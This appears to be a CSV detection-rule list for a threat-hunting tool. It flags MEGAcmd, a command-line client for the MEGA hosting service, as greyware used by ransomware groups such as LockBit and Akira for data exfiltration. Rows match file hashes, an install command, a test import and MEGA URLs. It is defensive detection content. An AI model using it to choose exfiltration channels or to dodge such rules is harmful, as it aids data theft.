"*b47b85efda1561b559c7d1a81e0d4b49958607f6e4933bf46f97f43c917f69a7*",".{0,1000}b47b85efda1561b559c7d1a81e0d4b49958607f6e4933bf46f97f43c917f69a7.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*b4fd5651fedd284d57bae7f1eee41e3f9ef77e2d21014159081ce9200f886ace*",".{0,1000}b4fd5651fedd284d57bae7f1eee41e3f9ef77e2d21014159081ce9200f886ace.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*b69c2f0acc58d45ae4dae502892af08ce9abaa0de2433573a07e9a06fae3a255*",".{0,1000}b69c2f0acc58d45ae4dae502892af08ce9abaa0de2433573a07e9a06fae3a255.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*b6ff6c05c78901dfc6291751bab1ae93a0ac836d8d506e57d2bb6fb927facc7d*",".{0,1000}b6ff6c05c78901dfc6291751bab1ae93a0ac836d8d506e57d2bb6fb927facc7d.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*b7b76dbe6c1976ebdb81e3b87284910f581cc79b7baa9f5073b0193c6f16b0d8*",".{0,1000}b7b76dbe6c1976ebdb81e3b87284910f581cc79b7baa9f5073b0193c6f16b0d8.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*b9c52c18fb7f1b046650f606aa2904b18b73108bc9fde5000a7953a294169532*",".{0,1000}b9c52c18fb7f1b046650f606aa2904b18b73108bc9fde5000a7953a294169532.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*baf01944477c9b110f7f0edf02e4c129e63e78d4a3e87db667e9b6bb2d8aeaad*",".{0,1000}baf01944477c9b110f7f0edf02e4c129e63e78d4a3e87db667e9b6bb2d8aeaad.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*bea14bb7e2fa975cdb9d73a326b3d4e7fdd0176774279e83e072641b8a8bfdfd*",".{0,1000}bea14bb7e2fa975cdb9d73a326b3d4e7fdd0176774279e83e072641b8a8bfdfd.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*c0f2a8d4c63349b7e3a5a34bae4a0994152c49bb4ee200ee4705b5599eef1b31*",".{0,1000}c0f2a8d4c63349b7e3a5a34bae4a0994152c49bb4ee200ee4705b5599eef1b31.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*c175bb05f516d617d49d4b0032f71265bf95c7e62c334ee16c0f3c3f87dbbe77*",".{0,1000}c175bb05f516d617d49d4b0032f71265bf95c7e62c334ee16c0f3c3f87dbbe77.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*c185b75ecfe16724160530bedfe237537b23e3dc2ec2f38869fa6698bf12ce74*",".{0,1000}c185b75ecfe16724160530bedfe237537b23e3dc2ec2f38869fa6698bf12ce74.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*c39719e5e79043b28a6368cdc942032bf5b2ab18fff2f66bd726058e9e921ef7*",".{0,1000}c39719e5e79043b28a6368cdc942032bf5b2ab18fff2f66bd726058e9e921ef7.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*c6f2a4b09f9249c4e77ad03cc0e15940f080c125187137bc88a7d2adf2a4916f*",".{0,1000}c6f2a4b09f9249c4e77ad03cc0e15940f080c125187137bc88a7d2adf2a4916f.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*caed90cc51561edd29eb5e842c266add1bb477261cf5254a0e2c218ed0737b93*",".{0,1000}caed90cc51561edd29eb5e842c266add1bb477261cf5254a0e2c218ed0737b93.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*cb984e4a89d00bb86a40eab7f7920e2bb739e3eb69a35596586f45e06619961f*",".{0,1000}cb984e4a89d00bb86a40eab7f7920e2bb739e3eb69a35596586f45e06619961f.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*cfcdba9a1f3f660957120a8096f37fba92e92e89a24a18c916130ab459cfcf73*",".{0,1000}cfcdba9a1f3f660957120a8096f37fba92e92e89a24a18c916130ab459cfcf73.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*d3b331e8568b4aa59710b2a731541d625138fa0d37aa26fda679a6b8713827ad*",".{0,1000}d3b331e8568b4aa59710b2a731541d625138fa0d37aa26fda679a6b8713827ad.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*d42e64cfcb227a43ebd33e91b8bf5f49c8095f588477a9400d1107aab52b84f4*",".{0,1000}d42e64cfcb227a43ebd33e91b8bf5f49c8095f588477a9400d1107aab52b84f4.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*d57684855baf42e911b235c7ffb5a106aac875461d5faeb059c4d941e7b5cfd6*",".{0,1000}d57684855baf42e911b235c7ffb5a106aac875461d5faeb059c4d941e7b5cfd6.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*d692deb721e9ac81db35e26542abbc64f26aebb0f232dab53d390de7a03461da*",".{0,1000}d692deb721e9ac81db35e26542abbc64f26aebb0f232dab53d390de7a03461da.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*d9b6a53b78a6ac70f165ebebd6ebea9de40da7b200a92d576ac3d687a27e158e*",".{0,1000}d9b6a53b78a6ac70f165ebebd6ebea9de40da7b200a92d576ac3d687a27e158e.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*dc0cea82985d2d307bfe4f5bd44736410c481b1d6070bac185b90bf1b53a7e5c*",".{0,1000}dc0cea82985d2d307bfe4f5bd44736410c481b1d6070bac185b90bf1b53a7e5c.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*dec4ee8bffdeb1c87164239a4104760f440b6399fefc897edd37f7094ebeb87c*",".{0,1000}dec4ee8bffdeb1c87164239a4104760f440b6399fefc897edd37f7094ebeb87c.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*df39fd5831826cb988eb5bfdfb4a98ca75eda8c03f6acdc286a7741448849c9b*",".{0,1000}df39fd5831826cb988eb5bfdfb4a98ca75eda8c03f6acdc286a7741448849c9b.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*df52291409a56fd512402124a94b51dda27c0b5caf2c93d36932e6ce2268bb3c*",".{0,1000}df52291409a56fd512402124a94b51dda27c0b5caf2c93d36932e6ce2268bb3c.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*dnf install *megacmd*",".{0,1000}dnf\sinstall\s.{0,1000}megacmd.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*e45eeac40ace7b050f9747d79954c4b7bb82792b727a691799694f109938b338*",".{0,1000}e45eeac40ace7b050f9747d79954c4b7bb82792b727a691799694f109938b338.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*e5d799f4ebb0f0a02c6c7efb0fd946a9a9f7b8283c5ccb697132974711060ccf*",".{0,1000}e5d799f4ebb0f0a02c6c7efb0fd946a9a9f7b8283c5ccb697132974711060ccf.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*e7ed5baca1c5f53c18e8d01bdb0e4d0f78b82bc72cb3afedac54a8ef8209ca34*",".{0,1000}e7ed5baca1c5f53c18e8d01bdb0e4d0f78b82bc72cb3afedac54a8ef8209ca34.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*eb1290f3e5914a7805f2767885b743705ac1526774f32f82ee14d899b0b43374*",".{0,1000}eb1290f3e5914a7805f2767885b743705ac1526774f32f82ee14d899b0b43374.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*eb58f70f2f5fb48cab8eb1127276b9a52bed2ba60e56f168ba3dc69d71d5f736*",".{0,1000}eb58f70f2f5fb48cab8eb1127276b9a52bed2ba60e56f168ba3dc69d71d5f736.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*ec616fea07e36749e5846b97eebe23138c7012699155f8a2cbd9c6c3e0b8bfca*",".{0,1000}ec616fea07e36749e5846b97eebe23138c7012699155f8a2cbd9c6c3e0b8bfca.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*f47d36b9cf879546d44f0efd0fe2e4c1fcd75a13f4d7eb3fb8e40296a1f333b2*",".{0,1000}f47d36b9cf879546d44f0efd0fe2e4c1fcd75a13f4d7eb3fb8e40296a1f333b2.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*f4f31a262a9a63438734a81d89462898a082278a49a41bed2f39792a6b3dbcc5*",".{0,1000}f4f31a262a9a63438734a81d89462898a082278a49a41bed2f39792a6b3dbcc5.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*f5793c201602a3619cac14d31d0356d058d8128b13027b1e64073dd029193614*",".{0,1000}f5793c201602a3619cac14d31d0356d058d8128b13027b1e64073dd029193614.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*f5cc9ce16100354271c7b385377053076c486cba84f21151a65721d24caecf09*",".{0,1000}f5cc9ce16100354271c7b385377053076c486cba84f21151a65721d24caecf09.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*f64064f35b2c464cb20fdcb70a8aa73856b6a8af65acd5be8d58b79df9889c1c*",".{0,1000}f64064f35b2c464cb20fdcb70a8aa73856b6a8af65acd5be8d58b79df9889c1c.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*f830d20d4677677a10833cee5fbfa7717d8b2d90a5ddc1fc0153426aa7267ec0*",".{0,1000}f830d20d4677677a10833cee5fbfa7717d8b2d90a5ddc1fc0153426aa7267ec0.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*fbb81f40c843fc33e57a23db01ee0f206c99c6ed75520a5594e0b3d525725215*",".{0,1000}fbb81f40c843fc33e57a23db01ee0f206c99c6ed75520a5594e0b3d525725215.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*ff9d4086614006d6372ab2ac9d750701157e40285452aba802460da8f91c404f*",".{0,1000}ff9d4086614006d6372ab2ac9d750701157e40285452aba802460da8f91c404f.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*from megacmd_tests_common import *",".{0,1000}from\smegacmd_tests_common\simport\s.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*https://mega.io/cmd#download*",".{0,1000}https\:\/\/mega\.io\/cmd\#download.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","1","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*https://mega.nz/folder/8L80QKyL#glRTp6Zc0gppwp03IG03tA*",".{0,1000}https\:\/\/mega\.nz\/folder\/8L80QKyL\#glRTp6Zc0gppwp03IG03tA.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","1","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*https://mega.nz/folder/bxomFKwL#3V1dUJFzL98t1GqXX29IXg*",".{0,1000}https\:\/\/mega\.nz\/folder\/bxomFKwL\#3V1dUJFzL98t1GqXX29IXg.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","1","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
